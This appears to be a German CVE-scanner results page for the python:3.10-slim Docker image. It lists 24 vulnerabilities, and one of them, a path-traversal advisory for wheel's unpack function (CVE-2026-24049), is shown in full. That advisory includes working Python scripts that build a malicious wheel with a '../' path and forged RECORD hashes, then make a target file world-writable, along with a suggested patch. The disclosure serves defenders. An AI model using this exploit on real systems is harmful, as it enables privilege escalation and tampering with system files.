Neues Image Scannen

CVE-Scan für python:3.10-slim

Docker-Image-Sicherheitslücken-Scanner

24 Bekannte Sicherheitslücken in diesem Docker-Image

0
Kritisch
1
Hoch
3
Mittel
20
Niedrig
0
Info/ Unbestimmt/ Unbekannt
CVE-IDSchweregradPaketBetroffene VersionBehobene VersionCVSS-Score
CVE-2026-24049highpkg:pypi/wheel@0.45.1>=0.40.0,<=0.46.10.46.27.1

Summary

  • Vulnerability Type: Path Traversal (CWE-22) leading to Arbitrary File Permission Modification.
  • Root Cause Component: wheel.cli.unpack.unpack function.
  • Affected Packages:
    1. wheel (Upstream source)
    2. setuptools (Downstream, vendors wheel)
  • Severity: High (Allows modifying system file permissions).

Details

The vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path.

# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)
for zinfo in wf.filelist:
    wf.extract(zinfo, destination)  # (1) Extraction is handled safely by zipfile

    # (2) VULNERABILITY:
    # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.
    # If zinfo.filename contains "../", this targets files outside the destination.
    permissions = zinfo.external_attr >> 16 & 0o777
    destination.joinpath(zinfo.filename).chmod(permissions)

PoC

I have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack.

Prerequisites: pip install setuptools

Step 1: Generate the Malicious Wheel (gen_poc.py)
This script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list.

import zipfile
import hashlib
import base64
import os

def urlsafe_b64encode(data):
    """
    Helper function to encode data using URL-safe Base64 without padding.
    Required by the Wheel file format specification.
    """
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')

def get_hash_and_size(data_bytes):
    """
    Calculates SHA-256 hash and size of the data.
    These values are required to construct a valid 'RECORD' file,
    which is used by the 'wheel' library to verify integrity.
    """
    digest = hashlib.sha256(data_bytes).digest()
    hash_str = "sha256=" + urlsafe_b64encode(digest)
    return hash_str, str(len(data_bytes))

def create_evil_wheel_v4(filename="evil-1.0-py3-none-any.whl"):
    print(f"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}")

    # 1. Prepare Standard Metadata Content
    # These are minimal required contents to make the wheel look legitimate.
    wheel_content = b"Wheel-Version: 1.0\nGenerator: bdist_wheel (0.37.1)\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
    metadata_content = b"Metadata-Version: 2.1\nName: evil\nVersion: 1.0\nSummary: PoC Package\n"
   
    # 2. Define Malicious Payload (Path Traversal)
    # The content doesn't matter, but the path does.
    payload_content = b"PWNED by Path Traversal"

    # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../'
    # The vulnerability allows 'chmod' to affect this path directly.
    malicious_path = "../../poc_target.txt"

    # 3. Calculate Hashes for Integrity Check Bypass
    # The 'wheel' library verifies if the file hash matches the RECORD entry.
    # To bypass this check, we calculate the correct hash for our malicious file.
    wheel_hash, wheel_size = get_hash_and_size(wheel_content)
    metadata_hash, metadata_size = get_hash_and_size(metadata_content)
    payload_hash, payload_size = get_hash_and_size(payload_content)

    # 4. Construct the 'RECORD' File
    # The RECORD file lists all files in the wheel with their hashes.
    # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here.
    # This tricks the 'wheel' library into treating the malicious file as a valid, verified component.
    record_lines = [
        f"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}",
        f"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}",
        f"{malicious_path},{payload_hash},{payload_size}",  # <-- Authenticating the malicious path
        "evil-1.0.dist-info/RECORD,,"
    ]
    record_content = "\n".join(record_lines).encode('utf-8')

    # 5. Build the Zip File
    with zipfile.ZipFile(filename, "w") as zf:
        # Write standard metadata files
        zf.writestr("evil-1.0.dist-info/WHEEL", wheel_content)
        zf.writestr("evil-1.0.dist-info/METADATA", metadata_content)
        zf.writestr("evil-1.0.dist-info/RECORD", record_content)

        # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file
        # We need to set specific permission bits to trigger the vulnerability.
        zinfo = zipfile.ZipInfo(malicious_path)
       
        # Set external attributes to 0o777 (rwxrwxrwx)
        # Upper 16 bits: File type (0o100000 = Regular File)
        # Lower 16 bits: Permissions (0o777 = World Writable)
        # The vulnerable 'unpack' function will blindly apply this '777' to the system file.
        zinfo.external_attr = (0o100000 | 0o777) << 16
       
        zf.writestr(zinfo, payload_content)

    print("[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.")

if __name__ == "__main__":
    create_evil_wheel_v4()

Step 2: Run the Exploit (exploit.py)

from pathlib import Path
import sys

# Demonstrating impact on setuptools
try:
    from setuptools._vendor.wheel.cli.unpack import unpack
    print("[*] Loaded unpack from setuptools")
except ImportError:
    from wheel.cli.unpack import unpack
    print("[*] Loaded unpack from wheel")

# 1. Setup Target (Read-Only system file simulation)
target = Path("poc_target.txt")
target.write_text("SENSITIVE CONFIG")
target.chmod(0o400) # Read-only
print(f"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}")

# 2. Run Vulnerable Unpack
# The wheel contains "../../poc_target.txt".
# unpack() will extract safely, BUT chmod() will hit the actual target file.
try:
    unpack("evil-1.0-py3-none-any.whl", "unpack_dest")
except Exception as e:
    print(f"[!] Ignored expected extraction error: {e}")

# 3. Check Result
final_perms = oct(target.stat().st_mode)[-3:]
print(f"[*] Final Perms: {final_perms}")

if final_perms == "777":
    print("VULNERABILITY CONFIRMED: Target file is now world-writable (777)!")
else:
    print("[-] Attack failed.")

result:
image

Impact

Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.

Recommended Fix

The unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract().

Suggested Patch:

# extract() returns the actual path where the file was written
extracted_path = wf.extract(zinfo, destination)

# Only apply chmod if a file was actually written
if extracted_path:
    permissions = zinfo.external_attr >> 16 & 0o777
    Path(extracted_path).chmod(permissions)
Relevance:

The relevance of CVE-2026-24049 depends on the specific usage of the python:3.10-slim image; if the application uses vulnerable components or libraries patched by this CVE, it could be critical in scenarios involving untrusted input or exposure to external networks. Without knowing the exact vulnerability details, it’s essential to assess if your application’s dependencies or environment are affected. Regular updates and security audits mitigate such risks. (Note: Relevance analysis is automatically generated and may require verification.)

Package URL(s):
  • pkg:pypi/wheel@0.45.1
CVE-2023-5752mediumpkg:pypi/pip@23.0.1<23.323.36.8
CVE-2025-8869mediumpkg:pypi/pip@23.0.1<=25.225.35.9
CVE-2025-45582mediumtar>=1.35+dfsg-3.1not fixed4.1
CVE-2007-5686lowshadow<=1:4.17.4-2not fixed3.1
CVE-2018-20796lowglibc<=2.41-12+deb13u1not fixed3.1
CVE-2021-45346lowsqlite3<=3.46.1-7not fixed3.1
CVE-2023-31437lowsystemd<=257.9-1~deb13u1not fixed3.1
CVE-2023-31439lowsystemd<=257.9-1~deb13u1not fixed3.1
CVE-2013-4392lowsystemd<=257.9-1~deb13u1not fixed3.1

Schweregradstufen

Ausnutzung könnte zu schwerwiegenden Konsequenzen wie Systemkompromittierung oder Datenverlust führen. Erfordert sofortige Aufmerksamkeit.

Sicherheitslücke könnte relativ leicht ausgenutzt werden und erhebliche Auswirkungen haben. Erfordert zeitnahe Aufmerksamkeit.

Ausnutzung ist möglich, erfordert aber möglicherweise spezifische Bedingungen. Auswirkungen sind moderat. Sollte zeitnah behoben werden.

Ausnutzung ist schwierig oder die Auswirkungen sind minimal. Kann bei Gelegenheit oder im Rahmen der regulären Wartung behoben werden.

Schweregrad ist nicht bestimmt, informativ oder vernachlässigbar. Überprüfung je nach Kontext.

Sliplane Icon
Über Sliplane

Sliplane ist eine einfache Container-Hosting-Lösung. Es ermöglicht dir, deine Container innerhalb von Minuten in der Cloud zu deployen und bei Bedarf zu skalieren.

Sliplane kostenlos testen

Über den CVE-Scanner

Der CVE-Scanner ist ein leistungsstarkes Tool, das dir hilft, bekannte Sicherheitslücken in deinen Docker-Images zu identifizieren. Indem deine Images mit einer umfassenden Datenbank von Common Vulnerabilities and Exposures (CVEs) abgeglichen werden, kannst du sicherstellen, dass deine Anwendungen sicher und auf dem neuesten Stand sind. Für weitere Details, schau dir die NIST CVE-Datenbank an.

Warum CVE-Scanning für deine Docker-Images wichtig ist

Mit dem Anstieg von Supply-Chain-Angriffen ist die Sicherung deiner Anwendungen wichtiger denn je. CVE-Scanning spielt eine entscheidende Rolle bei der Identifizierung von Sicherheitslücken, die von Angreifern ausgenutzt werden könnten, insbesondere solche, die durch Abhängigkeiten und Drittanbieter-Komponenten eingeführt werden. Regelmäßiges Scannen und Sichern deiner Docker-Images ist essenziell, um deine Anwendungen vor diesen sich entwickelnden Bedrohungen zu schützen.

Was ist eine CVE?

CVE steht für Common Vulnerabilities and Exposures. Es ist ein standardisierter Bezeichner für bekannte Sicherheitslücken, der Entwicklern und Organisationen ermöglicht, potenzielle Risiken effektiv zu verfolgen und zu beheben. Für weitere Informationen, besuche cve.mitre.org.

Vorteile des CVE-Scannens

  • Erhöhte Sicherheit: Erkenne und behebe Sicherheitslücken, bevor sie ausgenutzt werden.
  • Compliance: Erfülle Branchenstandards und regulatorische Anforderungen für sichere Software.
  • Proaktive Wartung: Bleibe potenziellen Bedrohungen einen Schritt voraus, indem du Sicherheitslücken frühzeitig behebst.

Wie der CVE-Scanner funktioniert

Der CVE-Scanner analysiert deine Docker-Images anhand einer umfassenden Datenbank bekannter Sicherheitslücken. Er nutzt Docker Scout im Hintergrund, um detaillierte Einblicke in betroffene Pakete, Schweregradstufen und verfügbare Fixes zu liefern, sodass du sofort handeln kannst.

Die Bedeutung des Patchens von Docker-Images

Das Patchen deiner Docker-Images ist ein entscheidender Schritt, um die Sicherheit und Stabilität deiner Anwendungen zu gewährleisten. Durch regelmäßige Updates deiner Images mit den neuesten Sicherheitspatches kannst du bekannte Sicherheitslücken beheben und das Risiko einer Ausnutzung reduzieren. Dieser proaktive Ansatz stellt sicher, dass deine Anwendungen widerstandsfähig gegenüber neuen Bedrohungen bleiben und hilft, die Einhaltung von Sicherheitsstandards zu gewährleisten.

Du willst dieses Image deployen?

Probiere Sliplane aus – eine einfache Docker-Hosting-Lösung. Sie bietet dir die Tools, um deine containerisierten Anwendungen bereitzustellen, zu verwalten und zu skalieren.